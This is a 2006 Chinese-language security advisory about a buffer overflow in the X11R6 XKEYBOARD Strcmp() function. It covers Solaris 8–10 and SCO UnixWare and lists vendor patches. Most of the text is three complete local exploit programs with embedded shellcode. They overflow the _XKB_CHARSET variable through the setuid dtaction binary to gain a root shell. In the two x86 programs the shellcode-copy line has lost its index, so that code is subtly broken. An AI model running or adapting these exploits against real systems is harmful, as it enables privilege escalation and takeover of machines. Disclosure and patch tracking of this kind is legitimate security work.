信息来源:绿盟科技
X.Org LibX11 XKEYBOARD扩展本地溢出漏洞
发布日期:2006-09-12
更新日期:2006-09-13
受影响系统:
Sun Solaris 9.0_x86
Sun Solaris 9.0
Sun Solaris 8.0_x86
Sun Solaris 8.0
Sun Solaris 10_x86
Sun Solaris 10.0
X.org X11R6 4.0
不受影响系统:
X.org X11R6 5.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 19905
X.Org是X.Org Foundation对X窗口系统的开源实现。
X11R6 X窗口系统库的字符控制函数中存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
如果将_XKB_CHARSET环境变量设置为很长的字符串并将DISPLAY环境变量设置为启用了XKEYBOARD扩展的X窗口系统服务器的话,则调用动态连接库时就会触发这个漏洞,导致执行任意指令。
X11R6.4中有漏洞的函数:
static int
#if NeedFunctionPrototypes
Strcmp(char *str1, char *str2)
#else
Strcmp(str1, str2)
char *str1, *str2;
#endif
{
char str[256];
char c, *s;
for (s = str; c = *str1++; ) {
if (isupper(c))
c = tolower(c);
*s++ = c;
}
*s = '\0';
return (strcmp(str, str2));
}
<*来源:Adriano Lima (
adriano@risesecurity.org)
Filipe Balestra (
filipe@balestra.com.br)
链接:
http://www.risesecurity.org/advisory.php?id=RISE-2006001.txt
http://sunsolve.sun.com/search/p ... etkey=1-26-102570-1
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
sol-sparc-xkb.c
/*
* X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC
* Copyright 2006 RISE Security <
contact@risesecurity.org>,
* Ramon de Carvalho Valle <
ramon@risesecurity.org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Compile with the following command.
* $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c
*
* Set the DISPLAY environment variable to a X Window System server with
* XKEYBOARD extension enabled.
* $ ./sol-sparc-xkb sprintf|strcpy xserver:display
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <dlfcn.h>
#include <link.h>
#include <sys/systeminfo.h>
#include <procfs.h>
#define BUFSIZE 13+256+64+2+1
#define FRMSIZE 64+3+1
#define ADRSIZE 2047+1
#define SHLSIZE strlen(shellcode)+1
#define DSPSIZE strlen(display)+1
#define ARGSIZE 7+1
#define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE
#define PFMSIZE strlen(platform)+1
#define PRGSIZE 20+1
#define PAD(a,b,c) \
a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8))):((a%8)?(12-(a%8)):4);
char shellcode[]= /* 60 bytes */
"\x90\x1a\x40\x09" /* xor %o1,%o1,%o0 */
"\x82\x10\x20\x17" /* mov 0x17,%g1 */
"\x91\xd0\x20\x08" /* ta 0x08 */
"\x21\x0b\xd8\x9a" /* sethi %hi(0x2f62696e),%l0 */
"\xa0\x14\x29\x6e" /* or %l0,0x96e,%l0 */
"\x23\x0b\xdc\xda" /* sethi %hi(0x2f736800),%l1 */
"\x90\x23\xa0\x08" /* sub %sp,0x08,%o0 */
"\x92\x23\xa0\x10" /* sub %sp,0x10,%o1 */
"\x94\x1a\x80\x0a" /* xor %o2,%o2,%o2 */
"\xe0\x23\xbf\xf8" /* st %l0,[%sp-0x08] */
"\xe2\x23\xbf\xfc" /* st %l1,[%sp-0x04] */
"\xd0\x23\xbf\xf0" /* st %o0,[%sp-0x10] */
"\xc0\x23\xbf\xf4" /* st %g0,[%sp-0x0c] */
"\x82\x10\x20\x3b" /* mov 0x3b,%g1 */
"\x91\xd0\x20\x08" /* ta 0x08 */
;
void *find_symbol(const char *symbol){
void *handle,*addr;
char *err;
if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){
fprintf(stderr,"%s\n",dlerror());
exit(EXIT_FAILURE);
}
dlerror();
addr=dlsym(handle,symbol);
if((err=dlerror())!=NULL){
fprintf(stderr,"%s\n",err);
exit(EXIT_FAILURE);
}
dlclose(handle);
return addr;
}
void *find_rwxmem(void){
FILE *fp;
prmap_t map;
int flags;
void *addr;
if((fp=fopen("/proc/self/map","rb"))==NULL){
perror("fopen");
exit(EXIT_FAILURE);
}
while(fread(&map,sizeof(map),1,fp)){
flags=map.pr_mflags;
if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){
if(flags&MA_STACK) continue;
addr=(void *)map.pr_vaddr;
}
}
fclose(fp);
return addr;
}
int main(int argc,char **argv){
char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p;
int base,offset,i,flag=0;
printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC\n");
printf("Copyright 2006 RISE Security <
contact@risesecurity.org>\n\n");
if(argc!=3){
fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}
if(!strcmp(argv[1],"sprintf")) flag=1;
if(!strcmp(argv[1],"strcpy")) flag=2;
if(!flag){
fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}
snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]);
if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){
perror("sysinfo");
exit(EXIT_FAILURE);
}
base=((int)argv[0]|0xffff);
base++;
offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE;
PAD(offset,1,sizeof(envp)-1);
*((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE;
*((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE;
*((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE;
switch(flag){
case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break;
case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4;
}
*((int *)addr[4])=(int)find_rwxmem()+4;
*((int *)addr[5])=*((int *)addr[4])-8;
p=buf;
sprintf(p,"_XKB_CHARSET=");
p=buf+13;
for(i=0;i<256;i++) *p++='A';
for(i=0;i<66;i++) *p++=addr[1][i%4];
*p='\0';
memcpy(buf+13+256+56,addr[0],4);
memcpy(buf+13+256+60,addr[3],4);
p=buf+1024;;
for(i=0;i<(FRMSIZE-1);i++) *p++=addr[1][i%4];
*p='\0';
memcpy(buf+1024+32,addr[4],4);
memcpy(buf+1024+36,addr[2],4);
memcpy(buf+1024+60,addr[5],4);
p=buf+2048;
for(i=0;i<(ADRSIZE-1);i++) *p++=addr[1][i%4];
*p='\0';
envp[0]=&buf[0];
envp[1]=&buf[1024];
envp[2]=&buf[2048];
envp[3]=shellcode;
envp[4]=display;
envp[5]=NULL;
execle("/usr/dt/bin/dtaction","AAAAAAA",0,envp);
exit(EXIT_FAILURE);
}
sol-x86-xkb.c
/*
* X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86
* Copyright 2006 RISE Security <
contact@risesecurity.org>,
* Ramon de Carvalho Valle <
ramon@risesecurity.org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define ADRSIZE 1024
#define NOPSIZE 4096
char shellcode[]= /* 47 bytes */
"\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */
"\x6a\x65" /* pushl $0x65 */
"\x89\xe6" /* movl %esp,%esi */
"\xf7\x56\x04" /* notl 0x04(%esi) */
"\xf6\x16" /* notb (%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17,%al */
"\xff\xd6" /* call *%esi */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68\x2f\x6b\x73\x68" /* pushl $0x68736b2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x50" /* pushl %eax */
"\x51" /* pushl %ecx */
"\x53" /* pushl %ebx */
"\xb0\x3b" /* movb $0x3b,%al */
"\xff\xd6" /* call *%esi */
;
int main(int argc,char **argv){
char buf[8192],display[256],addr[4],*envp[4],*p;
int i;
printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86\n");
printf("Copyright 2006 RISE Security <
contact@risesecurity.org>\n\n");
if(argc!=2){
fprintf(stderr,"usage: %s xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}
snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);
*((unsigned int *)addr)=(unsigned int)buf+256+1024+2048+1;
p=buf;
sprintf(p,"_XKB_CHARSET=");
p=buf+13;
for(i=0;i<256;i++) *p++='A';
for(i=0;i<ADRSIZE;i++) *p++=addr[i%4];
for(i=0;i<NOPSIZE;i++) *p++='\x90';
for(i=0;i<strlen(shellcode);i++) *p++=shellcode
;
*p='\0';
envp[0]=buf;
envp[1]=display;
envp[2]=NULL;
execle("/usr/dt/bin/dtaction","dtaction",0,envp);
exit(EXIT_FAILURE);
}
sco-x86-xkb.c
/*
* X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86
* Copyright 2006 RISE Security <contact@risesecurity.org>,
* Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define ADRSIZE 1024
#define NOPSIZE 4096
char shellcode[]= /* 43 bytes */
"\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */
"\x6a\x65" /* pushl $0x65 */
"\x89\xe6" /* movl %esp,%esi */
"\xf7\x56\x04" /* notl 0x04(%esi) */
"\xf6\x16" /* notb (%esi) */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\xb0\x17" /* movb $0x17,%al */
"\xff\xd6" /* call *%esi */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */
"\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\xb0\x3b" /* movb $0x3b,%al */
"\xff\xd6" /* call *%esi */
;
int main(int argc,char **argv){
char buf[8192],display[256],addr[4],*envp[4],*p;
int i;
printf("X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86\n");
printf("Copyright 2006 RISE Security <contact@risesecurity.org>\n\n");
if(argc!=2){
fprintf(stderr,"usage: %s xserver:display\n",argv[0]);
exit(EXIT_FAILURE);
}
snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]);
*((unsigned int *)addr)=(unsigned int)buf+2048+256+1024+2048+1;
p=buf;
sprintf(p,"_XKB_CHARSET=");
p=buf+13;
for(i=0;i<256;i++) *p++='A';
for(i=0;i<ADRSIZE;i++) *p++=addr[i%4];
for(i=0;i<NOPSIZE;i++) *p++='\x90';
for(i=0;i<strlen(shellcode);i++) *p++=shellcode;
*p='\0';
envp[0]=buf;
envp[1]=display;
envp[2]=NULL;
execle("/usr/dt/bin/dtaction","dtaction",0,envp);
exit(EXIT_FAILURE);
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Sun
---
Sun已经为此发布了一个安全公告(Sun-Alert-102570)以及相应补丁:
Sun-Alert-102570:Buffer Overflow Vulnerability in libX11
链接:http://sunsolve.sun.com/search/p ... etkey=1-26-102570-1
X.org
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.x.org/
